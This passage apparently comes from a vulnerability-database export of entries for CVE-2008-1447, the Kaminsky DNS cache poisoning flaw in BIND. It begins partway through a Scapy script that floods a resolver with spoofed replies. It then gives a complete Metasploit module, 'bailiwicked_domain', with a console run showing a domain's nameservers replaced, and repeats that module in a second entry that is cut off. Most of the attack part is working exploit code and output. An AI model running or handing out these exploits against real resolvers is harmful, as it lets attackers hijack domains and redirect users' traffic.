rdata=targetip, rdlen=4),\r\n\t\tns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\r\n\t)\r\n\r\n\r\ncurrentid = 1024\r\ndummyid = 3\r\nwhile 1:\r\n\tdummydomain = "a" + str(dummyid) + basedomain\r\n\tdummyid = dummyid + 1\r\n\t# request for our dummydomain\r\n\treq = IP(dst=targetdns)/ \\\r\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\r\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\r\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\r\n\t\t\t an=0,\r\n\t\t\t ns=0,\r\n\t\t\t ar=0\r\n\t\t)\r\n\tsend(req)\r\n\r\n\t# build the response\r\n\trep.getlayer(DNS).qd.qname = dummydomain\r\n\trep.getlayer(DNS).an.rrname = dummydomain\r\n\r\n\tfor i in range(50):\r\n\t\t# TXID\r\n\t\trep.getlayer(DNS).id = currentid\r\n\t\tcurrentid = currentid + 1\r\n\t\tif currentid == 65536:\r\n\t\t\tcurrentid = 1024\r\n\r\n\t\t# len and chksum\r\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\r\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\r\n\r\n\t\tprint "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\r\n\t\tsend(rep, verbose=0)\r\n\r\n\t# check to see if it worked\r\n\treq = IP(dst=targetdns)/ \\\r\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\r\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\r\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\r\n\t\t\t an=0,\r\n\t\t\t ns=0,\r\n\t\t\t ar=0\r\n\t\t)\r\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\r\n\ttry:\r\n\t\tif z[DNS].an.rdata == targetip:\r\n\t\t\tprint "Successfully poisonned our target with a dummy record !!"\r\n\t\t\tbreak\r\n\texcept:\r\n\t\tprint "Poisonning failed"\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-9168"}, {"lastseen": "2017-11-19T14:27:57", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (meta)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65607", "id": "SSV:65607", "sourceData": "\n ____ ____ __ __\r\n / \\ / \\ | | | |\r\n ----====####/ /\\__\\##/ /\\ \\##| |##| |####====----\r\n | | | |__| | | | | |\r\n | | ___ | __ | | | | |\r\n ------======######\\ \\/ /#| |##| |#| |##| |######======------\r\n \\____/ |__| |__| \\______/\r\n \r\n Computer Academic Underground\r\n http://www.caughq.org\r\n Exploit Code\r\n\r\n===============/========================================================\r\nExploit ID: CAU-EX-2008-0003\r\nRelease Date: 2008.07.23\r\nTitle: bailiwicked_domain.rb\r\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains\r\nTested: BIND 9.4.1-9.4.2\r\nAttributes: Remote, Poison, Resolver, Metasploit\r\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt\r\nAuthor/Email: I)ruid <druid (@) caughq.org>\r\n H D Moore <hdm (@) metasploit.com>\r\n===============/========================================================\r\n\r\nDescription\r\n===========\r\n\r\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\r\nwhich allow the insertion of malicious DNS records into the cache of the\r\ntarget nameserver. This exploit caches a single malicious nameserver\r\nentry into the target nameserver which replaces the legitimate\r\nnameservers for the target domain. By causing the target nameserver to\r\nquery for random hostnames at the target domain, the attacker can spoof\r\na response to the target server including an answer for the query, an\r\nauthority server record, and an additional record for that server,\r\ncausing target nameserver to insert the additional record into the\r\ncache. This insertion completely replaces the original nameserver\r\nrecords for the target domain.\r\n\r\n\r\nExample\r\n=======\r\n\r\n# /msf3/msfconsole\r\n\r\n ## ### ## ##\r\n ## ## #### ###### #### ##### ##### ## #### ######\r\n####### ## ## ## ## ## ## ## ## ## ## ### ##\r\n####### ###### ## ##### #### ## ## ## ## ## ## ##\r\n## # ## ## ## ## ## ## ##### ## ## ## ## ##\r\n## ## #### ### ##### ##### ## #### #### #### ###\r\n ##\r\n\r\n\r\n =[ msf v3.2-release\r\n+ -- --=[ 298 exploits - 124 payloads\r\n+ -- --=[ 18 encoders - 6 nops\r\n =[ 73 aux\r\n\r\nmsf > use auxiliary/spoof/dns/bailiwicked_domain\r\nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D\r\nRHOST => A.B.C.D\r\nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com\r\nDOMAIN => example.com\r\nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com\r\nNEWDNS => dns01.metasploit.com\r\nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0\r\nSRCPORT => 0\r\nmsf auxiliary(bailiwicked_domain) > check\r\n[*] Using the Metasploit service to verify exploitability...\r\n[*] >> ADDRESS: A.B.C.D PORT: 50391\r\n[*] >> ADDRESS: A.B.C.D PORT: 50391\r\n[*] >> ADDRESS: A.B.C.D PORT: 50391\r\n[*] >> ADDRESS: A.B.C.D PORT: 50391\r\n[*] >> ADDRESS: A.B.C.D PORT: 50391\r\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\r\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\r\n[*] exec: dig +short -t ns example.com @A.B.C.D\r\n\r\nb.iana-servers.net.\r\na.iana-servers.net.\r\n\r\nmsf auxiliary(bailiwicked_domain) > run\r\n[*] Switching to target port 50391 based on Metasploit service\r\n[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com\r\n[*] Querying recon nameserver for example.com.'s nameservers...\r\n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.\r\n[*] Querying recon nameserver for address of b.iana-servers.net....\r\n[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236\r\n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....\r\n[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.\r\n[*] Querying recon nameserver for address of a.iana-servers.net....\r\n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43\r\n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....\r\n[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...\r\n[*] Sent 1000 queries and 20000 spoofed responses...\r\n[*] Sent 2000 queries and 40000 spoofed responses...\r\n[*] Sent 3000 queries and 60000 spoofed responses...\r\n[*] Sent 4000 queries and 80000 spoofed responses...\r\n[*] Sent 5000 queries and 100000 spoofed responses...\r\n[*] Sent 6000 queries and 120000 spoofed responses...\r\n[*] Sent 7000 queries and 140000 spoofed responses...\r\n[*] Sent 8000 queries and 160000 spoofed responses...\r\n[*] Sent 9000 queries and 180000 spoofed responses...\r\n[*] Sent 10000 queries and 200000 spoofed responses...\r\n[*] Sent 11000 queries and 220000 spoofed responses...\r\n[*] Sent 12000 queries and 240000 spoofed responses...\r\n[*] Sent 13000 queries and 260000 spoofed responses...\r\n[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com\r\n[*] Auxiliary module execution completed\r\n\r\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\r\n[*] exec: dig +short -t ns example.com @A.B.C.D\r\n\r\ndns01.metasploit.com.\r\n\r\n\r\nCredits\r\n=======\r\n\r\nDan Kaminsky is credited with originally discovering this vulnerability.\r\n\r\nCedric Blancher <sid (@) rstack.org> figured out the NS injection method and \r\nwas cool enough to email us and share!\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\nhttp://www.kb.cert.org/vuls/id/800113\r\n\r\n\r\nMetasploit\r\n==========\r\n\r\nrequire 'msf/core'\r\nrequire 'net/dns'\r\nrequire 'scruby'\r\nrequire 'resolv'\r\n\r\nmodule Msf\r\n\r\nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary\r\n\r\n\tinclude Exploit::Remote::Ip\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'DNS BailiWicked Domain Attack',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \r\n\t\t\t\tDan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target\r\n\t\t\t\tdomains nameserver entries in a vulnerable DNS cache server. This attack works\r\n\t\t\t\tby sending random hostname queries to the target DNS server coupled with spoofed\r\n\t\t\t\treplies to those queries from the authoritative nameservers for that domain.\r\n\t\t\t\tEventually, a guessed ID will match, the spoofed packet will get accepted, and\r\n\t\t\t\tthe nameserver entries for the target domain will be replaced by the server\r\n\t\t\t\tspecified in the NEWDNS option of this exploit.\r\n\t\t\t},\r\n\t\t\t'Author' => \r\n\t\t\t\t[ \r\n\t\t\t\t'\tI)ruid', 'hdm',\r\n\t\t\t\t\t #\r\n\t\t\t\t\t'Cedric Blancher <sid[at]rstack.org>' # Cedric figured out the NS injection method \r\n\t\t\t\t\t # and was cool enough to email us and share!\r\n\t\t\t\t\t #\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 5591 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-1447' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '8000113' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 21 2008'\r\n\t\t\t))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),\r\n\t\t\t\t\tOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),\r\n\t\t\t\t\tOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),\r\n\t\t\t\t\tOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),\r\n\t\t\t\t\tOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),\r\n\t\t\t\t\tOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]),\r\n\t\t\t\t], self.class)\r\n\t\t\t\t\t\r\n\tend\r\n\t\r\n\tdef auxiliary_commands\r\n\t\treturn { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }\r\n\tend\r\n\r\n\tdef cmd_check(*args)\r\n\t\ttarg = args[0] || rhost()\r\n\t\tif(not (targ and targ.length > 0))\r\n\t\t\tprint_status("usage: check [dns-server]")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status("Using the Metasploit service to verify exploitability...")\r\n\t\tsrv_sock = Rex::Socket.create_udp(\r\n\t\t\t'PeerHost' => targ,\r\n\t\t\t'PeerPort' => 53\r\n\t\t)\t\t\r\n\r\n\t\trandom = false\r\n\t\tports = []\r\n\t\tlport = nil\r\n\t\t\r\n\t\t1.upto(5) do |i|\r\n\t\t\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\ttxt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n\t\t\treq.rd = 1\r\n\t\t\t\r\n\t\t\tsrv_sock.put(req.encode)\r\n\t\t\tres, addr = srv_sock.recvfrom()\r\n\t\t\t\r\n\r\n\t\t\tif res and res.length > 0\r\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\r\n\t\t\t\tres.each_answer do |name, ttl, data|\r\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\r\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\r\n\r\n\t\t\t\t\t\tprint_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}")\r\n\t\t\t\t\t\tt_port = t_port.to_i\r\n\t\t\t\t\t\tif(lport and lport != t_port)\r\n\t\t\t\t\t\t\trandom = true\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\t\tlport = t_port\r\n\t\t\t\t\t\tports << t_port\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\t\r\n\t\tend\r\n\t\t\r\n\t\tsrv_sock.close\r\n\t\t\r\n\t\tif(ports.length < 5)\r\n\t\t\tprint_status("UNKNOWN: This server did not reply to our vulnerability check requests")\r\n\t\t\treturn\r\n\t\tend\r\n\t\t\r\n\t\tif(random)\r\n\t\t\tprint_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}")\r\n\t\t\tprint_status(" This server may still be exploitable, but not by this tool.")\r\n\t\telse\r\n\t\t\tprint_status("FAIL: This server uses static source ports and is vulnerable to poisoning")\r\n\t\tend\r\n\tend\r\n\t\t\r\n\tdef run\r\n\t\ttarget = rhost()\r\n\t\tsource = Rex::Socket.source_address(target)\r\n\t\tsport = datastore['SRCPORT']\r\n\t\tdomain = datastore['DOMAIN'] + '.'\r\n\t\tnewdns = datastore['NEWDNS']\r\n\t\trecons = datastore['RECONS']\r\n\t\txids = datastore['XIDS'].to_i\r\n\t\tnewttl = datastore['TTL'].to_i\r\n\t\txidbase = rand(20001) + 20000\r\n\t\t\r\n\t\taddress = Rex::Text.rand_text(4).unpack("C4").join(".")\r\n\r\n\t\tsrv_sock = Rex::Socket.create_udp(\r\n\t\t\t'PeerHost' => target,\r\n\t\t\t'PeerPort' => 53\r\n\t\t)\r\n\r\n\t\t# Get the source port via the metasploit service if it's not set\r\n\t\tif sport.to_i == 0\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\ttxt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n\t\t\treq.rd = 1\r\n\t\t\t\r\n\t\t\tsrv_sock.put(req.encode)\r\n\t\t\tres, addr = srv_sock.recvfrom()\r\n\t\t\t\r\n\t\t\tif res and res.length > 0\r\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\r\n\t\t\t\tres.each_answer do |name, ttl, data|\r\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\r\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\r\n\t\t\t\t\t\tsport = t_port.to_i\r\n\r\n\t\t\t\t\t\tprint_status("Switching to target port #{sport} based on Metasploit service")\r\n\t\t\t\t\t\tif target != t_addr\r\n\t\t\t\t\t\t\tprint_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Verify its not already poisoned\r\n\t\tbegin\r\n\t\t\tquery = Resolv::DNS::Message.new\r\n\t\t\tquery.add_question(domain, Resolv::DNS::Resource::IN::NS)\r\n\t\t\tquery.rd = 0\r\n\r\n\t\t\tbegin\r\n\t\t\t\tcached = false\r\n\t\t\t\tsrv_sock.put(query.encode)\r\n\t\t\t\tanswer, addr = srv_sock.recvfrom()\r\n\r\n\t\t\t\tif answer and answer.length > 0\r\n\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\r\n\t\t\t\t\tanswer.each_answer do |name, ttl, data|\r\n\r\n\t\t\t\t\t\tif((name.to_s + ".") == domain and data.name.to_s == newdns)\r\n\t\t\t\t\t\t\tt = Time.now + ttl\r\n\t\t\t\t\t\t\tprint_status("Failure: This domain is already using #{newdns} as a nameserver")\r\n\t\t\t\t\t\t\tprint_status(" Cache entry expires on #{t.to_s}")\r\n\t\t\t\t\t\t\tsrv_sock.close\r\n\t\t\t\t\t\t\tdisconnect_ip\r\n\t\t\t\t\t\t\treturn\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\t\t\r\n\t\t\t\tend\r\n\t\t\tend until not cached\r\n\t\trescue ::Interrupt\r\n\t\t\traise $!\r\n\t\trescue ::Exception => e\r\n\t\t\tprint_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")\r\n\t\tend\r\n\r\n\r\n\t\tres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver\r\n\r\n\t\tprint_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}"\r\n\r\n\t\t# Look up the nameservers for the domain\r\n\t\tprint_status "Querying recon nameserver for #{domain}'s nameservers..."\r\n\t\tanswer0 = res0.send(domain, Net::DNS::NS)\r\n\t\t#print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"\r\n\r\n\t\tbarbs = [] # storage for nameservers\r\n\t\tanswer0.answer.each do |rr0|\r\n\t\t\tprint_status " Got an #{rr0.type} record: #{rr0.inspect}"\r\n\t\t\tif rr0.type == 'NS'\r\n\t\t\t\tprint_status " Querying recon nameserver for address of #{rr0.nsdname}..."\r\n\t\t\t\tanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname\r\n\t\t\t\t#print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"\r\n\t\t\t\tanswer1.answer.each do |rr1|\r\n\t\t\t\t\tprint_status " Got an #{rr1.type} record: #{rr1.inspect}"\r\n\t\t\t\t\tres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \r\n\t\t\t\t\tprint_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."\r\n\t\t\t\t\tanswer2 = res2.send(domain)\r\n\t\t\t\t\tif answer2 and answer2.header.auth? and answer2.header.anCount >= 1\r\n\t\t\t\t\t\tnsrec = {:name => rr0.nsdname, :addr => rr1.address}\r\n\t\t\t\t\t\tbarbs << nsrec\r\n\t\t\t\t\t\tprint_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\t\r\n\t\tend\r\n\r\n\t\tif barbs.length == 0\r\n\t\t\tprint_status( "No DNS servers found.")\r\n\t\t\tsrv_sock.close\r\n\t\t\tdisconnect_ip\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Flood the target with queries and spoofed responses, one will eventually hit\r\n\t\tqueries = 0\r\n\t\tresponses = 0\r\n\r\n\t\tconnect_ip if not ip_sock\r\n\r\n\t\tprint_status( "Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...")\r\n\r\n\t\twhile true\r\n\t\t\trandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname\r\n\r\n\t\t\t# Send spoofed query\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\treq.id = rand(2**16)\r\n\t\t\treq.add_question(randhost, Resolv::DNS::Resource::IN::A)\r\n\r\n\t\t\treq.rd = 1\r\n\r\n\t\t\tbuff = (\r\n\t\t\t\tScruby::IP.new(\r\n\t\t\t\t\t#:src => barbs[0][:addr].to_s,\r\n\t\t\t\t\t:src => source,\r\n\t\t\t\t\t:dst => target,\r\n\t\t\t\t\t:proto => 17\r\n\t\t\t\t)/Scruby::UDP.new(\r\n\t\t\t\t\t:sport => (rand((2**16)-1024)+1024).to_i,\r\n\t\t\t\t\t:dport => 53\r\n\t\t\t\t)/req.encode\r\n\t\t\t).to_net\r\n\t\t\tip_sock.sendto(buff, target)\r\n\t\t\tqueries += 1\r\n\t\t\t\r\n\t\t\t# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\r\n\t\t\treq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))\r\n\t\t\treq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns)))\r\n\t\t\treq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored\r\n\t\t\treq.qr = 1\r\n\t\t\treq.aa = 1\r\n\r\n\t\t\txidbase.upto(xidbase+xids-1) do |id|\r\n\t\t\t\treq.id = id\r\n\t\t\t\tbarbs.each do |barb|\r\n\t\t\t\t\tbuff = (\r\n\t\t\t\t\t\tScruby::IP.new(\r\n\t\t\t\t\t\t\t#:src => barbs[i][:addr].to_s,\r\n\t\t\t\t\t\t\t:src => barb[:addr].to_s,\r\n\t\t\t\t\t\t\t:dst => target,\r\n\t\t\t\t\t\t\t:proto => 17\r\n\t\t\t\t\t\t)/Scruby::UDP.new(\r\n\t\t\t\t\t\t\t:sport => 53,\r\n\t\t\t\t\t\t\t:dport => sport.to_i\r\n\t\t\t\t\t\t)/req.encode\r\n\t\t\t\t\t).to_net\r\n\t\t\t\t\tip_sock.sendto(buff, target)\r\n\t\t\t\t\tresponses += 1\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\t\t# status update\r\n\t\t\tif queries % 1000 == 0\r\n\t\t\t\tprint_status("Sent #{queries} queries and #{responses} spoofed responses...")\r\n\t\t\tend\r\n\r\n\t\t\t# every so often, check and see if the target is poisoned...\r\n\t\t\tif queries % 250 == 0 \r\n\t\t\t\tbegin\r\n\t\t\t\t\tquery = Resolv::DNS::Message.new\r\n\t\t\t\t\tquery.add_question(domain, Resolv::DNS::Resource::IN::NS)\r\n\t\t\t\t\tquery.rd = 0\r\n\t\r\n\t\t\t\t\tsrv_sock.put(query.encode)\r\n\t\t\t\t\tanswer, addr = srv_sock.recvfrom()\r\n\r\n\t\t\t\t\tif answer and answer.length > 0\r\n\t\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\r\n\t\t\t\t\t\tanswer.each_answer do |name, ttl, data|\r\n\t\t\t\t\t\t\tif((name.to_s + ".") == domain and data.name.to_s == newdns)\r\n\t\t\t\t\t\t\t\tprint_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")\r\n\t\t\t\t\t\t\t\tsrv_sock.close\r\n\t\t\t\t\t\t\t\tdisconnect_ip\r\n\t\t\t\t\t\t\t\treturn\r\n\t\t\t\t\t\t\tend\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\trescue ::Interrupt\r\n\t\t\t\t\traise $!\r\n\t\t\t\trescue ::Exception => e\r\n\t\t\t\t\tprint_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}")\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\nend\t\r\n\r\n# milw0rm.com [2008-07-23]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65607"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.4.1 9.4.2 - Remote DNS Cache Poisoning (Metasploit)", "edition": 1, "published": "2008-07-23T00:00:00", "title": "BIND 9.4.1 9.4.2 - Remote DNS Cache Poisoning (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-23T00:00:00", "id": "EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D", "href": "", "sourceData": " ____ ____ __ __\n / \\ / \\ | | | |\n ----====####/ /\\__\\##/ /\\ \\##| |##| |####====----\n | | | |__| | | | | |\n | | ___ | __ | | | | |\n ------======######\\ \\/ /#| |##| |#| |##| |######======------\n \\____/ |__| |__| \\______/\n \n Computer Academic Underground\n http://www.caughq.org\n Exploit Code\n\n===============/========================================================\nExploit ID: CAU-EX-2008-0003\nRelease Date: 2008.07.23\nTitle: bailiwicked_domain.rb\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains\nTested: BIND 9.4.1-9.4.2\nAttributes: Remote, Poison, Resolver, Metasploit\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt\nAuthor/Email: I)ruid <druid (@) caughq.org>\n H D Moore <hdm (@) metasploit.com>\n===============/========================================================\n\nDescription\n===========\n\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\nwhich allow the insertion of malicious DNS records into the cache of the\ntarget nameserver. This exploit caches a single malicious nameserver\nentry into the target nameserver which replaces the legitimate\nnameservers for the target domain. By causing the target nameserver to\nquery for random hostnames at the target domain, the attacker can spoof\na response to the target server including an answer for the query, an\nauthority server record, and an additional record for that server,\ncausing target nameserver to insert the additional record into the\ncache. This insertion completely replaces the original nameserver\nrecords for the target domain.\n\n\nExample\n=======\n\n# /msf3/msfconsole\n\n ## ### ## ##\n ## ## #### ###### #### ##### ##### ## #### ######\n####### ## ## ## ## ## ## ## ## ## ## ### ##\n####### ###### ## ##### #### ## ## ## ## ## ## ##\n## # ## ## ## ## ## ## ##### ## ## ## ## ##\n## ## #### ### ##### ##### ## #### #### #### ###\n ##\n\n\n =[ msf v3.2-release\n+ -- --=[ 298 exploits - 124 payloads\n+ -- --=[ 18 encoders - 6 nops\n =[ 73 aux\n\nmsf > use auxiliary/spoof/dns/bailiwicked_domain\nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D\nRHOST => A.B.C.D\nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com\nDOMAIN => example.com\nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com\nNEWDNS => dns01.metasploit.com\nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0\nSRCPORT => 0\nmsf auxiliary(bailiwicked_domain) > check\n[*] Using the Metasploit service to verify exploitability...\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\n[*] exec: dig +short -t ns example.com @A.B.C.D\n\nb.iana-servers.net.\na.iana-servers.net.\n\nmsf auxiliary(bailiwicked_domain) > run\n[*] Switching to target port 50391 based on Metasploit service\n[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com\n[*] Querying recon nameserver for example.com.'s nameservers...\n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.\n[*] Querying recon nameserver for address of b.iana-servers.net....\n[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236\n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....\n[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as\n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.\n[*] Querying recon nameserver for address of a.iana-servers.net....\n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43\n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....\n[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as\n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...\n[*] Sent 1000 queries and 20000 spoofed responses...\n[*] Sent 2000 queries and 40000 spoofed responses...\n[*] Sent 3000 queries and 60000 spoofed responses...\n[*] Sent 4000 queries and 80000 spoofed responses...\n[*] Sent 5000 queries and 100000 spoofed responses...\n[*] Sent 6000 queries and 120000 spoofed responses...\n[*] Sent 7000 queries and 140000 spoofed responses...\n[*] Sent 8000 queries and 160000 spoofed responses...\n[*] Sent 9000 queries and 180000 spoofed responses...\n[*] Sent 10000 queries and 200000 spoofed responses...\n[*] Sent 11000 queries and 220000 spoofed responses...\n[*] Sent 12000 queries and 240000 spoofed responses...\n[*] Sent 13000 queries and 260000 spoofed responses...\n[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com\n[*] Auxiliary module execution completed\n\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\n[*] exec: dig +short -t ns example.com @A.B.C.D\n\ndns01.metasploit.com.\n\n\nCredits\n=======\n\nDan Kaminsky is credited with originally discovering this vulnerability.\n\nCedric Blancher <sid (@) rstack.org> figured out the NS injection method and \nwas cool enough to email us and share!\n\n\nReferences\n==========\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\nhttp://www.kb.cert.org/vuls/id/800113\n\n\nMetasploit\n==========\n\nrequire 'msf/core'\nrequire 'net/dns'\nrequire 'scruby'\nrequire 'resolv'\n\nmodule Msf\n\nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary\n\n\tinclude Exploit::Remote::Ip\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\t\n\t\t\t'Name' => 'DNS BailiWicked Domain Attack',\n\t\t\t'Description' => %q{\n\t\t\t\tThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \n\t\t\t\tDan Kaminsky found and disclosed 